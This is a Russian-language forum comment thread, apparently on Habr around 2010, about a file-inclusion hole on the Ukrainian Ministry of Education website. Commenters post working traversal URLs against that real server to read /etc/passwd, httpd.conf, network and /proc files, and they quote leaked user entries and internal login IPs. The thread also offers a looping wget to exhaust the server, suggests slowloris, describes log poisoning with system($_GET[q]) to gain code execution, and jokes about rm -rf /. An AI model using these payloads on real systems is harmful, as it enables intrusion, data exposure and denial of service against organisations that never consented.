Министерство образования и науки Украины… Образование 2.0 говорите?

[@Mistinka]

Мне больше всего нравится вот такая ссылка www.mon.gov.ua/main.php?query=./

[@ipod]

Предупреждать же надо… Мой Chrome самоубился…

[@BarsMonster]

Файрфокс выдержал ) Главное быстро закрыть вкладку, пока памяти хватает :-D

[@d0z]

Лучшеб сдохла сразу ) у меня съела всю память, вместе с нею повисли кеды, пришлось вылазить в консоль и килять ее оттуда )

[@BarsMonster]

Вот именно для таких ситуаций и надо 8Гб памяти + своп

[@onk]

и подключению по 9600бод
чтоб не успело забить эти 8гиг

[@enartemy]

А что такого страшного-то? Ну страница размером 1,5 Мб. Опера выдержала без тормозов даже…

[@x_T]

странно, у меня не больше 200мб откушало

[@Tronum]

Как не странно мой хром выдержал. 2 Гб озу

[@oldengremlin]

Эту ссылку надо сделать главное на сайте www.mon.gov.ua! :)

[@BarsMonster]

А мне это нравится :-D

www.mon.gov.ua/main.php?query=../../../etc/passwd

[@lugansk]

Не в пользователях дело. См., к примеру, ниже.

[@YSPRO]

попробуйте wget www.mon.gov.ua/main.php?query=./

[@oldengremlin]

равно как и w3m www.mon.gov.ua/main.php?query=./
полёт нормальный, легко прерывающийся на ^C! :)

А канальчик у министерства неплохой — 2.5Мегабайта/с… ;)

[@kyrie]

Ну почему я сначала открыл, а потом почитал комменты? :)

Хром выдержал, хотя и крякнул про сбой модуля.

[@Davert]

Опера едва стерпела. Ждем Хабраэффекта )

[@sapun]

а мне www.mon.gov.ua/main.php?query=main.php

[@sapun]

ой, сори! не понял сразу ((

[@alexbozhko]

Увы, это не лень (закрыть дыру). Это полное отсутствие мотивации. Сидят в каком-нибудь ВУЗе (или непосредственно в здании Министерства) инженеры, и на свою мизерную ВУЗовско-инженерную ЗП сопровождают данный сайт. Мне в свое время доводилось поработать инженером в ВУЗе. Вспоминаю как страшный сон. И не потому, что ЗП маленькая. А потому, что болото. Никому ничего не надо. И у самого руки опускаются после этого.

[@rma4ok]

Этой дырой уже давно пользуются во всю мощь bit.ly/aVxfkY

[@CriggerMarg]

опачки. круто. Вот если с этим позвонить, может и почешутся в вузе своем

[@Shedar]

Спасибо, что продублировали размещенную мной в предыдущем посте на эту тему ссылку, а то он на главную не вышел и народу там куда меньше.

[@wRAR]

Это точно эта дыра?

[@xvoland]

Ха-ха! Прикольно!

Самое интересное, что сайт Міністерство освіти і науки України — этот сайт может нанести вред Вашему компьютеру, как говорит google!!!

О, как! =) Какие там в министерстве образованные люди распространяют трояны =)

[@d0z]

в нашем ВУЗе аналогичная ситуация. потому делаем что-то мы (студентешки) за зачеты и экзамены, да-да я возможно собрат автора этого сайта, я тоже иногда говнокожу не задумываясь о последствиях. возможно срабатывает «это не моя война», но скорее то, что результат не только не важен мне, но и «заказчик» в лице препода, тоже не очень-то заинтересован в качестве результата. потому делается все быстро и как попадет. В общем-то себя не оправдываю как и автора сайта — это в любом случае аукнится…

[@Demir0]

Не скажи. Один из сайтов, на который этот ссылается в колонке справа, делала говностудия моего знакомого. И платили они ему нормально. Так вот давеча там начала появляться порнушка. Сайт то бекапнули, дыры закрыли, а месяц в министерство еще пришлось походить. Вот так. А вы говорите студенты.

[@alexbozhko]

Ну, конечно бывает и так. Но основной мотив державных чиновников нанять стороннего разработчика — откат.

[@DarkTiger]

Бауманка, 2016, ИУ5. Сайт с задачами, расписаниями экзаменов-зачетов и прочим висел 2 месяца из-за сбоя установки плагина CMS, пока я не написал админам письмо с характеристикой их профессиональных качеств, устав наблюдать страдания сына-студента. Починили сразу же, но обиделись, со словами «это не наша работа, вообще-то, и нам за нее никто не платит».
Админы немного удивились — весь факультет страдал 2 месяца, и хоть бы кто их пнул…

[@unicast]

Ничего себе боян:
www.mon.gov.ua/main.php?query=../../../etc/fedora-release

[@wRAR]

Ядро там 2007 года зато.

[@wRAR]

Да и железо не самое старое.

[@Masterkey]

едиственное на что не скупяться в госструктурах так это на железо!
при мне покупали свеженькие блейд-контейнеры с двумя лезвиями на каждую область на ОДНО приложение, чтобы оно не тормозило!

[@BarsMonster]

Черд, я опоздал на минуту :-D

[@mafet]

www.mon.gov.ua/main.php?query=../../../../proc/cpuinfo =)

[@pilsen]

хватит точки ставить, от корня работает
www.mon.gov.ua/main.php?query=/proc/cpuinfo

[@fozzy]

www.mon.gov.ua/main.php?query=../../../etc/issue
Ужас…

[@mafet]

www.mon.gov.ua/main.php?query=/etc/httpd/conf/httpd.conf

[@mq0]

www.mon.gov.ua/main.php?query=main.php — словарь программиста на букву Р: рекурсия — смотри рекурсию

[@apk]

Админ молодец. Настроил сервер так что хабраэфект держит

[@kirushik]

Ещё бы, один на восьмиядерном Xeon.

[@Javoronok]

может пару моих проектиков возьмет в свою беседку? я бы присоседился на такое железо!

[@oldengremlin]

Имхо всё зависит от того сколько бабла ты готов с ними распилить… ;)

[@FlexIDK]

www.mon.gov.ua/main.php?query=./main.php

[@FlexIDK]

я заметил только после того как написал =((( извини

[@mafet]

давайте дружно wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null =)

[@abelozor]

И Хабраэффект его не берёт…

[@d1m]

slowloris должен справиться.

[@mafet]

Кстати оно за файрволом.
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth0
www.mon.gov.ua/main.php?query=/etc/sysconfig/network-scripts/ifcfg-eth1
www.mon.gov.ua/main.php?query=/etc/rc.local
Проц хороший, а памяти маловато
www.mon.gov.ua/main.php?query=/proc/meminfo

[@bolk]

В включение удалённого PHP-кода через HTTP работает?

[@symbix]

похоже, что внешние соединения фаерволом прикрыты (если сунуть ftp://-линк, надолго задумывается, но соединения со стороны сервака не видно).

[@z123]

правильно дядя говорит — «никакой опасности она не представляет, что это только read only и т.п.»
а то, что детки немного обучатся работе с операционной системой линукс (при чём им даже будет это интересно, что есть одним их элементов педагогики) — это ж и есть то самое «образование 2.0» :)

[@ZUZ]

представляю себе занятие в компьютерном классе где-нить в Севастополе:
«сегодняшняя тема урока — Хабраэффект

для опытов сегодня мы воспользуемся любезно предоставленным сервером родного Міністерство освіти і науки України
вот его адрес…

Итак — кто первый скажет, что за операционная система на нем установлена?
Сколько памяти на нем установлено и какова загрузка проуессоров?

… А теперь все разом делаем wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null и смотрим на то как он потихоньку умирает :)

[@oldengremlin]

$ wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null
--13:59:52--  http://www.mon.gov.ua/main.php?query=./main.php
           => `/dev/null'
Распознаётся www.mon.gov.ua... 212.111.193.189
Устанавливается соединение с www.mon.gov.ua|212.111.193.189|:80... соединение установлено.
Запрос HTTP послан, ожидается ответ... 200 OK
Длина: нет информации [text/html]

    [                <=>                                                                                               ] 21 568 452     6.78M/s             

13:59:58 (6.75 MB/s) - `/dev/null' сохранён [21568452]

20 мегабайт и усё. Запускаемся по новой… А посему, детки, делаем так:

while [ 1 == 1 ]; do wget www.mon.gov.ua/main.php?query=./main.php -O /dev/null; done

[@skobkin]

while true можно :)

[@oldengremlin]

Можно, но… привычка — вторая натура :)

[@mafet]

Походу сайт очень уж текстовый. Никаких фич нет особых, на сервере есть постгрес, мускуль. Но хз для чего используется =)

[@Chumicheff]

Мне вот интересно, когда же кто-нибудь rm -rf / сделает…

[@Goodkat]

sudo rm -rf /

[@iNight]

ну или chmod 666 /

[@Quiz]

В списке пользователей есть некто 'petrik'.
Мне страшно.

[@lugansk]

почти одновременно заметили :)

[@lugansk]

строка 49 /etc/passwd:

petrik:x:511:100::/home/petrik:/bin/bash

Неужели тот самый? :)

[@CharnaD]

Юзера gryzlov или gryzlovman рядом нету. Значит не тот.

[@mafet]

это то же самое что и ..../main.php?query=./ сколько же можно уже…

[@cblp]

Уже кто-нибудь подобрал пароль к lenka или pavel?

[@xvoland]

Вся пионерская организация — в шоке! =)

[@aspel]

www.zone-h.org/mirror/id/7106111

[@Demir0]

mon.gov.ua все? таки сдох?

[@mnemoLinux]

Может кто-то сервер выключил? :) У меня внезапно перестал пинговаться их сервер.

[@kirushik]

habrahabr.ru/blogs/infosecurity/90473/#comment_2724997
Сработало, похоже

[@Effector]

Походу приняли кое-какие меры — теперь страница с новостями показывается. Если Хабр вынудил админов пофиксить сайт — слава Хабру, слава Хабралюдям! Мы делаем этот мир лучше! :)

[@oldengremlin]

Да. Именно хабр.
Веду переписку с AVB40-UANIC.
Думаю, что у них всё получится.

[@lugansk]

Не только валидацию данных наконец-то добавили, но даже интересную папку personal потёрли.

[@LitrKonyaka]

Почти оффтоп. Ходил в пенсионный на персонификацию, начали визжать мол подпишись на нашу газетку. Я говорю давайте на рассылку подпишусь, rss там какой… уже менее уверенно говорю: 21 век… совсем тихо: у вас же компьютеры у каждого… При всем при том в пенсионном работников старше 25 не видел, а уж бюрократии круче чем там и вовсе не видал в жизни. Страшно подумать что государство на самом деле прибыльная конторка, от прибылей которой зависят судьбы многих людей, страшно потому что с такими интерфейсами прибыльными быть просто невозможно.

[@Demir0]

У них там свои схемы, они на этом живут. Я когда штраф платил за то, что не вовремя сдал отчет в налоговую, перечислял 55 грн за подписку какой-то местной «мурзилки» :) И это на уровне всей налоговой. Думал только мне это сказали сделать или у моего оператора какой-то там откат, но у кого не спрашивал, все говорят, что да, так и делают обычно.
В итоге я так и не сросся с нашей системой и уже закрываю личную деятельность, параллельно подыскивая трактор.

[@LitrKonyaka]

Мне сначала предложила девочка-инспектор задним числом, но вначале нужно было зайти к другой девочке которая начала возникать на предмет «купить слона». Получив ответ на вопрос " а кто это вам разрешил задним" вскинула ручки и выпалила что-то вроде: ааа, так у нее зарплата больше чем у нас, потому она такая добрая! А мы нет — тут же отрезала из-за спины девочка в громадной оправе и непринужденно наглой позе. Ну тут мне совсем уж все это начало напоминать зачет в универе и с нового захода, через день, я с порога начал просто тупо нагло врать что все проплатил, а корешок забыл. Фокус был в том что корешок (неоплаченный), зараза, лежал по самому центру в полупрозрачном файлике, том самом которым я размахивал у ее носа читая лекции о вреде бюрократии для малого бизнеса. В общем все это было бы очень весело если бы не убило три моих рабочих дня, при том что налоговая юзает опенайди и деньги мои видит без труда, а вот пенсионный ввел свои айдишки и хоть деньги и пришли, но 5 листов бумаги все равно скозлить нужно… Бред короче, тоже свернулся бы, да неудобно будет.

[@akirsanov]

Находите логи вебсервера, дергаете запрос host/?<?php system($_GET[q]) ?>, инклудите лог, PROFIT!

[@Olegas]

Шикарная идея!

[@egorinsk]

Последние входы пользователей:

0 Wed Mar 24 14:55:36 2010 pts/1 10.0.2.143
7 Tue Nov 13 11:21:54 2007 pts/6 webmon.uintei.kiev.ua
500 Sun Jul 20 15:50:12 2008 pts/3 192.168.254.1
501 Wed May 28 16:32:01 2008 pts/3 192.168.254.1
512 Thu Nov 19 15:29:58 2009 pts/1 94.74.70.25
516 Fri Feb 27 12:23:16 2009 pts/2 10.0.1.69
520 Thu Aug 14 08:05:06 2008 pts/3 10.0.1.2
522 Thu Jul 24 06:27:38 2008 pts/2 10.0.1.2
523 Thu Feb 11 09:28:10 2010 pts/1 10.0.2.143
525 Thu Feb 11 09:43:41 2010 pts/3 94.74.70.25

[@Silenttouch]

Какой поп, такой и приход.

[@vovchisko]

Это ещё что. У нас в одном институте большая часть преподавателей задания раздают студентам вКонтакте, и группы себ посоздавали. УНЫНИЕ!!!

[@Marsikus]

Ох уж этот хабра-снобизм. Когда какой-то политик или профессор ведет Twitter или Facebook аккаунт, так здесь аж визжат от радости. А тут вдруг VK, так сразу беда-катастрофа и уныние.
Есть какая-то принципиальная разница, а?

[@vovchisko]

Ну, с момента написания своего предыдущего коментария я немного отступил от своей позиции, но мне всё ещё кажется что раздавать учебные задания в группе вконтакте как-то не серьёзно. Как и в FB собственно. Тем более что большая часть специальностей — «айтишные». Можно же как-то это оформить более официально?

[@Marsikus]

Даже нужно. Но если институту крупно положить болт на автоматизацию учебного процесса, то инициативы одного преподавателя совершенно не достаточно будет. Вот он и ищет пути.
Наверное раньше он студентам просто рассылки по e-mail делал. А вконтактовская группа позволяет выкладывать и более-менее по темам содержать текстовые, графические, аудио- и видеоматериалы для учебного процесса. Почему бы не воспользоваться таким решением за недоступностью лучшего в их условиях.

[@Paketik]

Была же статья в хакере 10 года, номер журнала 134. Называлась она «GOV сайты под угрозой». Все расписано. Оригинал тут uasc.org.ua/2010/03/811/ (Кстати странно, редакция журнала без каких либо уведомлений внесла коррективы в статью)

[@mr_avi]

www.mon.gov.ua/main.php?query=laws/license/base/8`